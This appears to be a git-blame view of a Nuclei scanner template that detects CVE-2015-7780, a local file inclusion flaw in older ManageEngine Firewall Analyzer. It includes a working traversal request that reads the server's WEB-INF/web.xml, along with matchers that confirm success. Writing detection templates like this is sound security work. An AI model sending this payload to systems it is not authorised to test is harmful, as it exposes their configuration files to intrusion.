2021-09-20 13:55:31 +00:00
|
|
|
id: CVE-2015-7780
|
|
|
|
|
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion
|
2021-09-20 13:55:31 +00:00
|
|
|
author: daffainfo
|
|
|
|
severity: medium
|
2022-07-26 13:45:11 +00:00
|
|
|
description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.
|
2021-09-20 13:55:31 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/35933
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html
|
|
|
|
- http://jvn.jp/en/jp/JVN21968837/index.html
|
2022-07-26 13:45:11 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-7780
|
2021-09-20 18:09:33 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.5
|
2021-09-20 18:09:33 +00:00
|
|
|
cve-id: CVE-2015-7780
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: manageengine,edb,cve,cve2015,lfi
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2021-09-20 13:55:31 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-09-20 13:55:31 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "</web-app>"
|
|
|
|
- "java.sun.com"
|
|
|
|
part: body
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "application/xml"
|
2022-07-26 13:45:11 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/07/22
|